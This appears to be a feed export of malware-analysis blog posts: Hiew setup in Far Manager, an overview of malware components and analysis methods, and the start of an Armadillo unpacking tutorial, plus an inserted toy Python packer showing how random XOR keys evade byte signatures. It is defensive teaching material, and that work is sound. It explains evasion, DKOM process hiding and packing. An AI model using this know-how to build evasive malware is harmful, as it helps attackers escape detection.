<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> to open a file in hiew ,from command line, I need to type the command <b>hiew32demo.exe </b></span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">file__full_path</b><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> where </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">file__full_path </b><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">is the parameter to hiew32demo.exe .</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
To add a command I need to press <b>F2. </b><br />
<div dir="ltr" id="docs-internal-guid-a0408c1a-7fff-4e12-652c-6fd59e18610d" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<img height="136" src="https://lh6.googleusercontent.com/QkONqUZIsCdO9Og4Eqc-VtQD_k2rxtUFWdkoe1SQLv5RWOshrdOEcJEEAagrw14hKdYLTQZALWUsptWqgqzVJGEr3UVG_-Y0vVOpY6A0es5FgzTydjvRfEaRe9cYUFvbW3nKKx4c" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="431" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
A window pops up over Far Manager that lists the keys Del, Ins, F4 and Alt+F4; you can try out each of them. To add Hiew I press the <b>Ins key</b>.</div>
<div dir="ltr" id="docs-internal-guid-d19a9740-7fff-e244-fc5b-89cfda98d557" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;"><img height="159" src="https://lh4.googleusercontent.com/SFCR_LcafjXU6-lVGA55_kQy-l58iCFBvrDHJ8P_6709akkbTL97dn14kQb3X6tK860n9xhyK1XC3XPQzOCbXsRX-mVPTaYb8tW4Y-64jte9jqB_9Dso_JHq8T6Ejw-1MqMf-HRh" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">After pressing the Insert key I get a window like the one below.</span><img height="376" src="https://lh6.googleusercontent.com/Y_o7KsWcLUUbkjT4drPJZygyXOx5A9EU1Ef0pZZJEK8sKGe3NET7Fnr7NEQ1TZQq0nENcSYQ-GVu2A2IhViKUjYCNUdXUx589y4a-hAQsPk4ZfxWipGU4WjlfTv-H3Yu7p0xnFhN" style="margin-left: 0px; margin-top: 0px;" width="624" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Hotkey is the shortcut key; I have put <b>h</b> here. Label is just for your reference; I have entered "hiew". In Commands I have put <b>D:\tools\hiew\hiew32demo.exe "!.!"</b>, where "!.!" stands for the currently selected file, which becomes the parameter to hiew32demo.exe.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;">Now in order to save the command use arrow button to reach [<b>ok</b>] in menu and then press enter.</span></span><img height="242" src="https://lh4.googleusercontent.com/TFffszk6A2j6uv0WAnUO-RwGCGvy-1fbI2D3gVWWoxwfNW7ldkroBUFTcW2SaIKjxSHbJn0rM5k_Sc4lDeJgsCn359Ap0s8XeGuQytzR9NxPvFgqKfgyOqDVryPR2lh5AU7wXqLf" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="400" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">Hiew is now added to my tools. To open a file in Hiew I move the cursor onto the file, press </span><b style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">F2</b><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"> for the user menu and then </span><b style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">h</b><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">, the hotkey I assigned.</span></div>
<div dir="ltr" id="docs-internal-guid-2c41a1fb-7fff-ffe2-947c-74d0b23615d2" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 357px; overflow: hidden; width: 453px;"><img height="357" src="https://lh4.googleusercontent.com/SR8O_dhIjZKbrFpHg859YRcYe6XN8L7wf5S82Jm7vJVkkpUaPJfozbVHYvHaxoknIX5R7DBFpwl8Xoq7VXfzr3XwHP39hvSQaj1kzfz6jsHSkQeJdZmrb-KCr5oCOPX55RKxBFmU" style="margin-left: 0px; margin-top: 0px;" width="453" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Hiew to be continued in next blog.</span></span></div>
</div>
</div>
</div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-10574615417304590392019-07-16T20:09:00.003-07:002019-07-17T06:46:03.813-07:00Simplifying Malware Analysis:<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-04d3e32b-7fff-c20f-f2b6-77ba8ce17562" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">This article is meant for people who want to start a career in malware analysis. Malware analysis is a growing need in the cyber security industry as attacks involving malware increase. The article explains how to approach malware analysis; before that, it is important to understand how malware works. These are the topics I will cover:</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware Components </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Malware Analysis Steps</span></li>
</ol>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 14pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Malware Components</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">In order to understand malware in a better manner I have broken down the malware into components. Below is a diagram for understanding the various components.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">I have broken down the malware into the following components:</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Payload</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Packer</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Persistence </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Armoring</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Stealth</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Communication</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Propagation</span></li>
</ol>
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://lh4.googleusercontent.com/273qArxVEAmOZ2_1uoqFg26TThcjojhqNDYb3WpXjLn5w8w4YxQ7BSy5jQjQ9H-QorNBAjSFNv2Fut7XFIZBs9an9BLDO_ccQ9kWDngNvJbWRUaIEiruxeRPseflW8meuRpgXG7e" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="180" src="https://lh4.googleusercontent.com/273qArxVEAmOZ2_1uoqFg26TThcjojhqNDYb3WpXjLn5w8w4YxQ7BSy5jQjQ9H-QorNBAjSFNv2Fut7XFIZBs9an9BLDO_ccQ9kWDngNvJbWRUaIEiruxeRPseflW8meuRpgXG7e" style="border: none;" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Malware Components</td></tr>
</tbody></table>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span><br />
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">The payload is the mandatory component of a piece of malware; the rest are optional.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul style="text-align: left;">
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Payload </span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">is the core component of the malware: it carries out the malware's final intention, such as stealing credentials saved in a browser or stealing banking credentials. Malware should be classified and named based on its payload.</span></li>
<ul>
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Password Stealer (PWS)</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> - steals passwords saved by browsers, FTP clients and similar applications</span></li>
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Banking Malware</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> - built specifically to steal banking credentials or to perform a man-in-the-middle attack on banking sessions</span></li>
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Ransomware</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> - demands a ransom from the victim, usually after taking sensitive data or system resources hostage (most commonly by encrypting the victim's files)</span></li>
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Adware</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> - displays unwanted advertisements to the victim</span></li>
<li><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Point of Sale (POS) malware</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> - steals credit card data from systems connected to POS devices</span></li>
</ul>
</ul>
<br />
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Packer</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> is an envelope over the payload. While reverse engineering malware, you need to remove this envelope in order to see the actual payload or functionality of the malware. A packer has algorithms which compress the code. Since the actual malware code is compressed by the packer, it is hard to see the actual payload by static analysis (I will talk about static analysis later in the article; for the time being, consider static analysis here as viewing the executable in a hex editor). A packer is a program that takes an executable as input and produces a packed executable. The original executable and the packed executable look different when static analysis is done on them. A polymorphic packer takes one executable program as input and creates multiple (possibly millions of) packed executables which look different from each other under static analysis. These executables are released in the wild through various channels such as spam and exploit kits. The packed executables differ from one another when an analyst performs static analysis on them, but their behavior (dynamic analysis) is the same. So if an antivirus engineer writes a static detection signature on a few of the packed executables, there is a chance that the signature will not detect all the executables created by the polymorphic packer. This is one of the methods by which malware evades static antivirus signatures.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img height="360" src="https://lh5.googleusercontent.com/QbW8AYTzCWUzsy05nztA2IHDvJnC-WTqIxqgRbZuDs8S1fg6EabScYxhQ3pySVbNX2I5x_VWHjuBQ-9kr8GnFuZ25TT4WPDH2ODyzh4xj5pWV2dghqKOtHggyljCO_8DGMtTSpel" style="border: none; margin-left: auto; margin-right: auto;" width="624" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Polymorphic Packer</td></tr>
</tbody></table>
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"></span></div>
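<p>As an added illustration (this is my code, not the author's, and not a real packer), the toy below models the one property of a polymorphic packer that defeats byte signatures: every run produces a different-looking file from the same payload. The "packer" is a 16-byte random XOR key, and the "payload" and "signature" are constructed strings, not bytes from any real sample. Running the static signature over many variants catches none of them, while the same signature over the unpacked content catches all of them, which is why the unpacked form (dumped from memory, as in the unpacking posts further down) is what static signatures should be written on.</p>

```python
import hashlib
import os

# Constructed stand-in for a malware payload (plain text, not real code).
PAYLOAD = b"payload: connect to CnC, steal browser passwords, persist via Run key"
# A byte pattern an AV engineer might extract from the payload as a static signature.
SIGNATURE = b"steal browser passwords"
KEY_LEN = 16


def toy_pack(payload, key=None):
    """Toy 'polymorphic packer': XOR the payload with a random per-variant key.

    Returns key || encoded bytes. Real packers compress and prepend an
    unpacking stub; this models only the property that matters here:
    every variant looks different on disk while carrying the same payload.
    """
    if key is None:
        key = os.urandom(KEY_LEN)
    encoded = bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(payload))
    return key + encoded


def toy_unpack(packed):
    """Reverse toy_pack: what the stub (or the analyst's memory dump) yields."""
    key, encoded = packed[:KEY_LEN], packed[KEY_LEN:]
    return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(encoded))


def static_signature_match(data, signature=SIGNATURE):
    """A byte-pattern signature, as a static AV engine would apply it."""
    return signature in data


def make_variants(n):
    """Emulate the packer being run n times on the same payload."""
    return [toy_pack(PAYLOAD) for _ in range(n)]


def evaluate(variants):
    """Compare signature hits on the packed bytes with hits on the unpacked content."""
    packed_hits = sum(static_signature_match(v) for v in variants)
    unpacked_hits = sum(static_signature_match(toy_unpack(v)) for v in variants)
    distinct_hashes = len({hashlib.sha256(v).hexdigest() for v in variants})
    return {
        "variants": len(variants),
        "packed_hits": packed_hits,        # signature written on packed form
        "unpacked_hits": unpacked_hits,    # same signature on unpacked form
        "distinct_hashes": distinct_hashes,  # every variant has a new file hash
    }


if __name__ == "__main__":
    result = evaluate(make_variants(50))
    print("variants: %(variants)d, distinct SHA-256: %(distinct_hashes)d" % result)
    print("signature hits on packed files: %(packed_hits)d" % result)
    print("signature hits after unpacking: %(unpacked_hits)d" % result)
```

A key of all zero bytes turns the toy packer into the identity and the signature is found in the packed file again, which is the degenerate case a weak packer configuration produces.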
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Persistence:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware needs to stay in the system and survive reboots. A banking malware or stealer needs to stay active in the system even after a reboot. The techniques with which malware survives a reboot are called persistence mechanisms. Most malware uses operating system features to persist.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Armoring</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware does not want to be analysed or detected, and security researchers try to break it. Armoring is what malware uses to protect itself. Anti-debugging, VM detection, sandbox detection and analysis-tool detection are various armoring techniques employed by malware.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Stealth</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware needs to hide itself in the system so that the user does not suspect it. Stealth techniques range from simply setting the hidden file attribute to code injection techniques, and rootkits can also be considered a stealth mechanism. A rootkit is often considered a type of malware, but I would say a rootkit is a technique to hide malware. The payload could be something like a banking trojan that wants to hide itself. Most rootkits alter the functionality of APIs or the data structures used by the operating system. For example, Windows keeps its processes in a doubly linked list in which each node represents a process, and tools such as Task Manager ultimately rely on it. Removing a node from that linked list hides the process. This rootkit technique is called DKOM (Direct Kernel Object Manipulation). </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Communication</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware communicates with the attacker through command and control (CnC) servers. The reason could be anything: uploading stolen data, receiving commands, etc.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Propagation</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware needs to spread across computers in a network or outside the network. Autorun worms used pen drives to spread from one machine to another. The infamous WannaCry used the EternalBlue exploit to propagate through the network. PE file infection (file infectors) is a spreading mechanism used by </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 14pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Malware Analysis</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware analysis is done in order to find out whether a program is malware and, if so, its impact on the system. It is performed in three ways:</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Static</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Dynamic </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Reverse Engineering</span></li>
</ol>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Static Analysis</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Static analysis is done without executing the sample. A sample is opened in a static analysis tool to view static properties. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">It is hard to derive conclusions from static analysis, as malware may be obfuscated. Then why do we perform static analysis?</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Static analysis can form the basis of dynamic analysis. Here is an example of an analysis step: I get a sample and check its first few bytes in a hex editor. I see MZ at the start of the file, so I consider it a Windows executable. Then I check whether it is a 32-bit or 64-bit executable. If it is 64-bit, I would use a 64-bit Windows OS for dynamic analysis.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img height="460" src="https://lh3.googleusercontent.com/Fl5n9X0H_MZzOb_9xCFE6yhA3xP1JMTaDc8-92M278PLGbv0kTiKrABId24P7X7CichHcasjDuEb1Oi35ZB1KJKRBPB9YDzdi19WJmPoFx3ia-m8GfWu6N22EheAE-yKbjRjkHfB" style="border: none; margin-left: auto; margin-right: auto;" width="624" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Malware Analysis Steps</td></tr>
</tbody></table>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">If I find that the file is a Microsoft Word document (.docx), then I would need to install Microsoft Word in my analysis machine for further dynamic analysis.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Dynamic Analysis</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Dynamic analysis is performed in order to find the changes done by the malware to the system. The changes can include :</span><br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">file modification </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">configuration changes </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">network communication </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Process changes -code injections,API hooks</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Mutexes created</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">System code modifications(kernel level API hooks and data structure modifications)</span></li>
</ul>
</div>
<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reverse Engineering</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Reverse engineering is performed if it is hard to draw conclusions from dynamic analysis. A malware may not execute completely if it detects a virtual machine environment (armoring), hence we will not get conclusive results from dynamic analysis. In this case reverse engineering is performed to locate the code that detects virtual machines and patch it so that the malware executes. There can be many other purposes of reverse engineering:</span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Finding out the algorithms used by malware</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Writing better antivirus signatures</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Finding out more secrets in the malware, such as similarity with existing malware used in some attack</span></li>
</ul>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Malware Analysis Training:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">All these topics are covered in detail in my training. Apart from this, malware detection is also included in the training. Contact me at </span><a href="mailto:abhijit.mohanta.15.08@gmail.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">abhijit.mohanta.15.08@gmail.com</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> for training.</span></div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-69338319784239664452018-04-23T01:24:00.002-07:002018-04-23T01:27:29.191-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
My book on Ransomware<br />
<div dir="ltr" id="docs-internal-guid-d975b279-f19a-3344-0338-7cf568705f99" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.amazon.in/Preventing-Ransomware-Understand-remediate-ransomware/dp/1788620607">https://www.amazon.in/Preventing-Ransomware-Understand-remediate-ransomware/dp/1788620607</a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_NQrfhY4hLiIZCy4NbXCNJh5odbxq5-FMtsaqsBABkg1Zk-9VfquXeSfgd-MOahYCKe5-PTKQGzWLJmhfjCCuZuvZIXLdWg9S5rwksp1unMu6obO9l-RqHzv68heCdMm-IGoc0VA3eSA/s1600/4193Zq3AgqL._SX404_BO1%252C204%252C203%252C200_.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="406" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg_NQrfhY4hLiIZCy4NbXCNJh5odbxq5-FMtsaqsBABkg1Zk-9VfquXeSfgd-MOahYCKe5-PTKQGzWLJmhfjCCuZuvZIXLdWg9S5rwksp1unMu6obO9l-RqHzv68heCdMm-IGoc0VA3eSA/s320/4193Zq3AgqL._SX404_BO1%252C204%252C203%252C200_.jpg" width="259" /></a></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Hope you would love to read it.</div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-55775261954507486562017-03-03T22:57:00.003-08:002017-03-03T22:57:41.961-08:00Unpacking Malware in minutes<div dir="ltr" style="text-align: left;" trbidi="on">
Many tricks can be devised to unpack malware. This trick is applicable to
malware that overwrites its image header while unpacking. <br />
Sample used:<br />
<b>sha256: <a href="https://www.virustotal.com/intelligence/search/?query=microsoft%3Akuluoz#sha256">320fe97d257b99edb4089daea01fce31a13eabaa850ccae9e8b7e59342cb31c7</a></b><br />
<b>md5: <a href="https://www.virustotal.com/intelligence/search/?query=microsoft%3Akuluoz#md5">dca9106dc8556f9a15d7e18b4fad5d44</a></b><br />
This sample is packed with the Armadillo packer. Let's check the PE header of the packed file.
You can use tools like CFF Explorer, Hiew and many others.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgescKCS7P80d2iw1aGTE0oPxfN3SXDe8LZX9C9M6R2NAaRciwD3rg4r-bAFepQ89GC-J6ZyggfF1hyphenhyphenDldIoXGoHEztw3mdn0Qj0tPZU8A28nSzJZZbeFf6oKTZ9IPBP-RUPvS9B5RS0ZiT/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgescKCS7P80d2iw1aGTE0oPxfN3SXDe8LZX9C9M6R2NAaRciwD3rg4r-bAFepQ89GC-J6ZyggfF1hyphenhyphenDldIoXGoHEztw3mdn0Qj0tPZU8A28nSzJZZbeFf6oKTZ9IPBP-RUPvS9B5RS0ZiT/s320/1.png" width="320" /></a></div>
<br />
Fig: PE header, entry point 0x1D16<br />
<br />
Now load the file in OllyDbg. <br />
